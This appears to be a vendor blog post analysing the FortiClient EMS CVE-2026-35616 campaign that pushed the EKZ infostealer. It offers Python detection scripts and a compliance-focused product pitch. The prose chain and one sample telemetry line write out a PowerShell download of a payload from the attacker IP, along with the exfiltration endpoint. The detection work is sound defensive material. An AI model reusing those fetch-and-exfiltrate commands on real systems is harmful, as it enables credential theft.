FortiClient EMS CVE-2026-35616: when the security vendor's management plane ships the malware
The EKZ infostealer arrived on managed endpoints disguised as a Fortinet patch — pushed through the FortiClient EMS API after an unauthenticated bypass. Two months between disclosure and active campaign, and Fortinet still hasn't published IOCs.
On 27 May 2026 Arctic Wolf published the technical reconstruction of a campaign that had been running in customer networks for weeks: unauthenticated attackers abused CVE-2026-35616 on internet-exposed FortiClient EMS instances, modified VPN policies and endpoint update workflows on the management plane, and used that legitimate distribution channel to push an executable called FortiEndpoint_Patch.exe to every managed device. The executable was the EKZ infostealer. Every Chrome, Edge and Firefox credential — plus session cookies that the operator's MFA was supposed to protect — left the network over plain HTTP to a single VPS at 83.138.53.110.
The interesting part is not the infostealer. It is that the endpoints did exactly what they were configured to do — accept and execute an update from their security vendor's management server. The trust relationship that makes EMS useful is the same trust relationship that made the attack invisible. This is the supply-chain pattern auditors keep writing about in the abstract, instantiated in a real network with a real CVE.
What CVE-2026-35616 actually is
CVE-2026-35616 is an improper access control flaw in the FortiClient EMS API. The NVD record classifies it as CWE-284 with a CVSS 3.1 base of 9.8 (Fortinet's own advisory FG-IR-26-099 scored it 9.1; the difference is in scope assumptions, not in severity). An unauthenticated attacker sends crafted HTTP requests that bypass authentication on privileged endpoints. Affected: FortiClient EMS 7.4.5 and 7.4.6. Patched in 7.4.7. EMS 7.2 and earlier branches are not affected.
watchTowr's Attacker Eye sensors caught exploitation in the wild on 31 March 2026 — four days before Fortinet's advisory landed. Fortinet published the PSIRT bulletin on 4 April 2026 and CISA added the CVE to the Known Exploited Vulnerabilities catalogue two days later, on 6 April 2026, with a federal due date of 9 April 2026.
Federal civilian agencies had 72 hours. Everyone else had whatever cadence their change-management board allowed.
The two-month gap nobody talks about
Here is the timeline as a single table, because it is the whole story:
| Date | Event |
|---|---|
| 31 Mar 2026 | watchTowr observes active exploitation in the wild |
| 03 Apr 2026 | NVD publishes CVE-2026-35616 |
| 04 Apr 2026 | Fortinet PSIRT advisory FG-IR-26-099 |
| 06 Apr 2026 | CISA KEV addition (FCEB deadline 9 Apr) |
| early May 2026 | Arctic Wolf begins observing EKZ deployment via EMS |
| 27 May 2026 | Arctic Wolf publishes the full campaign analysis |
| 28 May 2026 | BleepingComputer coverage |
Two months from CISA's mandatory patch order to the first publicly documented infostealer campaign that abused the same flaw. The window was not idle. By the time Arctic Wolf wrote up the EKZ activity, the same Tor exit nodes (185.220.101.15, 192.42.116.14) had been knocking on FortiClient EMS APIs across multiple customer environments. Anyone still on 7.4.5 or 7.4.6 in mid-May had been exposed since early April. That is the gap continuous validation exists to close, and it is the gap that quarterly pentests structurally cannot.
How the EKZ campaign actually plays out
The novel part is not the post-exploitation code — EKZ is a competent but unremarkable Chromium and Gecko credential stealer. The novelty is the delivery path. The attacker never touches the endpoint directly. They authenticate to the EMS (well, bypass authentication on the EMS), modify a VPN policy, push a configuration that drops a script into C:\Program Files\Fortinet\FortiClient\logs\Trace\scripts\{GUID}.cmd, and let the FortiClient endpoint software do the rest.
Arctic Wolf's execution chain reads like a defender's worst case:
fortitray.exe (or ipsec.exe) launches cmd.exe, which calls powershell.exe with a base64-encoded payload that downloads hxxp://83.138.53.110/dl/p.exe to C:\ProgramData\aslog.txt, renames it to FortiEndpoint_Patch.exe, executes it, and exfiltrates harvested data to hxxp://83.138.53.110/service/save.php over plain HTTP.
Read that again with a SIEM analyst's eye. Every step is a legitimate FortiClient operation. The parent process is signed. The PowerShell call is base64-encoded but PowerShell is constantly invoked by EDR agents and management tools — alerting on every base64 invocation drowns the SOC. The download is over HTTP, which is suspicious but not unheard of for "update mirrors". The destination filename is FortiEndpoint_Patch.exe — the security vendor's own product. The exfil endpoint is /service/save.php on a single IP, but the volume per host is small (cookies, autofill, cached passwords compressed).
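One way to turn the chain above into endpoint detection content, as an added example that is not part of the original post or of Arctic Wolf's report. It assumes Sysmon-style process-creation records (pid, ppid, image, cmdline) and flags powershell.exe reached via fortitray.exe or ipsec.exe through cmd.exe whose encoded payload fetches anything over plain HTTP; the sample telemetry is constructed.

```python
import base64
import re

# Constructed allow-list: the FortiClient parents named in the execution chain.
FORTI_PARENTS = {"fortitray.exe", "ipsec.exe"}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def find_forti_launched_downloads(events):
    """Alert on fortitray.exe/ipsec.exe > cmd.exe > powershell.exe whose
    encoded script contains a plain-HTTP URL. Other encoded PowerShell is ignored."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        grand = by_pid.get(parent["ppid"]) if parent else None
        if parent is None or grand is None:
            continue
        if parent["image"].lower() != "cmd.exe" or grand["image"].lower() not in FORTI_PARENTS:
            continue
        urls = re.findall(r"http://\S+", decode_encoded_command(e["cmdline"]), re.I)
        if urls:
            chain = f'{grand["image"]} > {parent["image"]} > {e["image"]}'
            alerts.append({"pid": e["pid"], "chain": chain, "urls": urls})
    return alerts


def _enc(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample telemetry: the EKZ chain from the text plus one benign encoded call.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "fortitray.exe", "cmdline": "fortitray.exe"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe",
     "cmdline": r"cmd.exe /c C:\Program Files\Fortinet\FortiClient\logs\Trace\scripts\{GUID}.cmd"},
    {"pid": 300, "ppid": 200, "image": "powershell.exe", "cmdline": "powershell.exe -NoP -EncodedCommand "
     + _enc(r"Invoke-WebRequest http://83.138.53.110/dl/p.exe -OutFile C:\ProgramData\aslog.txt")},
    {"pid": 400, "ppid": 1, "image": "sensor.exe", "cmdline": "sensor.exe"},
    {"pid": 500, "ppid": 400, "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _enc("Get-Process | Out-Null")},
]
```

The benign encoded call from sensor.exe is deliberately not flagged, which is the point: the parent chain plus the plain-HTTP fetch is the signal, not base64 on its own.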
The credential stealer itself uses IElevator::DecryptData for Chromium master-key extraction and dynamically loads NSS libraries to read Firefox profiles. It targets autofill (credit cards, addresses, phone numbers) and session cookies — which is the MFA bypass everyone is now learning to worry about. Once you have a valid okta.session cookie, the second factor was already presented; you do not need to present it again.
Fortinet's PSIRT advisory does not publish IOCs. The detection signal Arctic Wolf surfaces is a log line — Certificate not found in request header followed by a successful certificate update from fortinet-ca2. If you are not watching EMS logs for that specific anomaly, the management plane looks fine.
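A stateful check for that EMS log anomaly, as an added example that is not part of the original post. It assumes a simple one-line-per-event layout (timestamp, src, quoted msg, optional issuer) for the constructed sample; the success message text and the five-minute window are assumptions, and the regex must be adapted to the real EMS log format.

```python
import re
from datetime import datetime, timedelta

# Assumed line layout for the constructed EMS log sample below; adapt LINE_RE
# to the real EMS log format in your environment.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) msg="(?P<msg>[^"]*)"(?: issuer=(?P<issuer>\S+))?'
)
NOT_FOUND = "Certificate not found in request header"


def parse(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_cert_bypass_sequence(lines, window=timedelta(minutes=5)):
    """Per source address: a NOT_FOUND event followed within `window` by a
    successful certificate update issued by fortinet-ca2. A lone successful
    update (a normally enrolled client) is not flagged."""
    pending = {}  # src -> timestamp of the most recent NOT_FOUND line
    hits = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        if ev["msg"] == NOT_FOUND:
            pending[ev["src"]] = ev["ts"]
        elif ev["msg"] == "Certificate update succeeded" and ev["issuer"] == "fortinet-ca2":
            t0 = pending.pop(ev["src"], None)
            if t0 is not None and ev["ts"] - t0 <= window:
                hits.append({"src": ev["src"], "not_found": t0, "update": ev["ts"]})
    return hits


# Constructed sample: one suspicious sequence from a Tor exit named in the text,
# one ordinary enrolled client, one not-found whose update lands outside the window.
SAMPLE_LOG = """\
2026-05-02T10:14:03Z src=185.220.101.15 msg="Certificate not found in request header"
2026-05-02T10:14:04Z src=185.220.101.15 msg="Certificate update succeeded" issuer=fortinet-ca2
2026-05-02T10:20:11Z src=10.20.30.40 msg="Certificate update succeeded" issuer=fortinet-ca2
2026-05-02T11:00:00Z src=192.42.116.14 msg="Certificate not found in request header"
2026-05-02T12:30:00Z src=192.42.116.14 msg="Certificate update succeeded" issuer=fortinet-ca2
""".splitlines()
```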
Why the existing defence stack misses it
Three reasons, all structural:
- The patching window assumes there is a window. Quarterly pentest engagements and annual TLPT cycles cannot observe a fix that needs to be applied in 72 hours. Even monthly external scans miss a two-week active exploitation window. The defensive cadence has to match the offensive cadence, and offensive cadence is now measured in days from CISA add to in-the-wild use of the same vendor's product as a malware channel.
- Signature-based detection cannot catch a signed parent process running its native update flow. fortitray.exe is on every endpoint allowlist that includes Fortinet. The only anomaly visible without behavioural analysis is the unexpected outbound HTTP to 83.138.53.110 — and many environments still permit endpoint software to fetch updates over HTTP because that is what some vendors actually do.
- Vendor advisories without IOCs put the burden back on the customer. Fortinet's choice not to publish IOCs is defensible (they did not want to tip off attackers about telemetry blind spots), but it means the SOC has to invent its own detection content from third-party reports. Arctic Wolf's writeup is the IOC source of record for this campaign. CrowdStrike, Microsoft and Cisco have all done the same in recent quarters. The IOC-less advisory is not an exception any more.
What NIS2 and DORA actually require here
Both frameworks have moved past the "trust the vendor" assumption.
NIS2 Article 21(2)(d) lists supply chain security among the mandatory risk-management measures, and Annex I of the Italian transposition (D.Lgs. 138/2024) requires essential and important entities to test the security of products and services received from ICT suppliers, not just the security of what they build themselves. A patch lag of two months on a CVSS 9.8 vulnerability in a tool that has write access to every managed endpoint is exactly what the Italian ACN auditor will ask about in the first inspection cycle — the first NIS2 audit deadline lands on 30 June 2026.
DORA Article 28 and the TLPT Regulatory Technical Standards published in early 2025 extend the same logic to financial entities. ICT third-party risk has to be evidenced, not assumed. The auditor wants to see when the FortiClient EMS instance was last patched, when it was last tested, what the detection coverage of the EMS API was at the time, and what the response time would have been if an unauthenticated configuration change appeared in the logs. "We trust Fortinet's defaults" is not an answer the regulator accepts.
ENISA's threat landscape work over the last two cycles has been almost monotonous on this point: the 2024 and 2025 reports both highlight supply chain and managed-service-provider compromise as a top trend, and the percentage of incidents that begin with a known-CVE on an internet-exposed vendor product keeps climbing. CVE-2026-35616 is going to feed the next edition.
What changes if validation is continuous
The defensive answer to the FortiClient EMS pattern is not "patch faster" — every CISO already wanted to patch faster. The answer is to make exposure visible the day it appears, and to make the evidence of that visibility auditable when the regulator asks.
Zero Hunt's 10-agent generative pentest engine targets exactly this gap. The Recon agent enumerates the external perimeter on every scheduled and change-triggered campaign, identifies new appliances and management planes (FortiClient EMS exposes a distinct fingerprint that the engine flags by default), and the Exploit and Credential agents validate the exploitable state of the host against the 21 threat intelligence sources synced continuously — including CISA KEV, NVD and ExploitDB. When CVE-2026-35616 hit KEV on 6 April, every Zero Hunt customer with an EMS in scope would have seen a fresh finding on the next campaign cycle, with the exploit chain proven in an ephemeral container rather than inferred from a version banner. The two-month window between CISA add and Arctic Wolf publishing is the window where unvalidated patch lag becomes a documented infostealer campaign — and it is the window where continuous validation has measurable defensive value.
The compliance side closes the loop. Each finding, scan and remediation is mapped automatically against the 32 frameworks the engine tracks — NIS2 Title 13, DORA Article 28, ISO 27001 A.5.21 (supplier relationships), NIST CSF SC.RM-04 — and signed with ECDSA at write time so the audit bundle the ACN inspector or the EBA TLPT lead actually asks for is generated continuously rather than reconstructed quarterly. Cross-framework mapping means the same FortiClient EMS finding becomes evidence in NIS2, DORA, ISO and SOC 2 audits simultaneously, instead of three separate teams writing three separate narratives about the same patch lag.
The wire side is the third leg, and it is the one that catches the campaigns that slip through the first two. Zero Hunt's AI Traffic Analysis runs on the appliance GPU at 2.7+ Gbit/s, with four parallel inference heads (suspicious traffic, malware classification, attack type, application fingerprinting). The PowerShell-launched HTTP transfer to 83.138.53.110 from a host that historically only talks to Fortinet update CDNs is the exact behavioural signature the traffic head was trained to flag — during the exfiltration, not in next morning's SIEM digest, and without any dependency on Fortinet publishing the IOC list.
The vendor management plane is part of the attack surface. Treat it that way before the auditor does.